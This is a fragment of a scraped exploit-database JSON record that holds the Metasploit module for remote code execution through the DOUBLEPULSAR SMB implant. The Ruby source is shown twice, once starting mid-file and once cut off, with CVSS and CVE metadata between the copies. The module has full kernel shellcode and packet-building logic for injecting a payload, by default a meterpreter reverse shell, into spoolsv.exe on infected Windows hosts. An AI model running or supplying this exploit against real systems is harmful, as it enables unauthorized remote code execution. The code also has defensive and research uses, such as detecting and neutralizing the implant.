defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-11-04] #"}, "lastseen": "2021-11-03T22:13:48", "differentElements": ["sourceData"], "edition": 64}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "a8b2704d0e9c8615f952cbe7ab1d5421", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-11-04T22:15:36", "history": [], "viewCount": 113, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-04T22:15:36", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-04T22:15:36", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an 